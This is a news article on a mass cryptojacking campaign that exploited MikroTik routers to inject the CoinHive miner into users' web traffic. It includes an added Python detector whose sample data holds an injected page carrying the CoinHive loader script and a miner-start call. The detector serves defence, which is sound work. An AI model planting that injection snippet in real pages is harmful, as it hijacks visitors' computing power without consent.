Massive Cryptomining Attack on ISP Routers Spreads Globally

A massive hacking campaign has compromised tens of thousands of routers and is using that network of vulnerable devices to spread cryptomining malware to the users whose traffic passes through them.

By exploiting a flaw found in over 170,000 routers made by MikroTik, attackers have injected a cryptomining script into the web pages served to unsuspecting users behind those devices, in what amounts to a cryptojacking frenzy, Trustwave researcher Simon Kenin wrote in a post today.

While most of the affected devices are located in Brazil, the script has been discovered on other devices operating around the world. “I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale,” the researcher wrote, adding:

“Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices.”

Since MikroTik manufactures devices used by ISPs, web companies and businesses alike, each device can serve tens if not hundreds of users daily, exposing all of them to the cryptomining script.

Initially, every user behind an affected router reportedly received the CoinHive cryptomining script regardless of which website they visited. Even if the injection only worked on error pages carrying the script, “we’re still talking about potentially millions of daily pages for the attacker,” the researcher added.
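To make the injection concrete, here is an added example (not code from the article or from Trustwave) showing how a defender could scan captured HTTP response bodies for the Coinhive loader pattern, whether the miner was injected into every page or only into router error pages. The sample pages and the site key are constructed for illustration; the Coinhive hostnames and the `CoinHive.Anonymous` constructor are the publicly known loader pattern, not values quoted from the report.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Public indicators of the Coinhive browser miner: the hosted loader script
# and the constructor that starts mining with the attacker's site key.
# These are the known Coinhive patterns, not values taken from the Trustwave post.
COINHIVE_HOSTS = ("coinhive.com", "coin-hive.com")
SITE_KEY_RE = re.compile(r"CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9_\-]+)['\"]")


class _ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and inline <script> bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def scan_response(body: str) -> dict:
    """Flag a response body that loads the Coinhive miner or calls its constructor."""
    parser = _ScriptCollector()
    parser.feed(body)
    findings = {"loader_urls": [], "site_keys": []}
    for src in parser.external:
        # urlparse handles absolute and scheme-relative (//host/...) URLs alike
        host = (urlparse(src).hostname or "").lower()
        if any(host == h or host.endswith("." + h) for h in COINHIVE_HOSTS):
            findings["loader_urls"].append(src)
    for code in parser.inline:
        findings["site_keys"].extend(SITE_KEY_RE.findall(code))
    findings["suspicious"] = bool(findings["loader_urls"] or findings["site_keys"])
    return findings


def flag_injected_pages(responses):
    """Return the URLs whose bodies carry the miner; responses is a list of (url, body)."""
    return [url for url, body in responses if scan_response(body)["suspicious"]]


# Constructed sample traffic: one clean page and one router error page with the
# miner injected. The site key is a placeholder, not a real Coinhive key.
CLEAN_PAGE = """<html><head><title>Example</title>
<script src="https://www.example.org/static/app.js"></script></head>
<body><p>Hello</p></body></html>"""

INJECTED_ERROR_PAGE = """<html><head><title>Error</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('EXAMPLE_SITE_KEY_0000'); miner.start();</script>
</head><body><h1>404 Not Found</h1></body></html>"""

SAMPLE_RESPONSES = [
    ("http://www.example.org/", CLEAN_PAGE),
    ("http://www.example.org/missing", INJECTED_ERROR_PAGE),
]

if __name__ == "__main__":
    for url, body in SAMPLE_RESPONSES:
        print(url, scan_response(body))
    print("flagged:", flag_injected_pages(SAMPLE_RESPONSES))
```

Running this over a proxy or packet capture export would surface the injected loader on pages whose origin servers never referenced Coinhive, which is exactly the signal that distinguishes router-level injection from a site that was itself compromised.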

So far, the investigation into the campaign has not identified who is behind the attack.

Image credit: Flickr.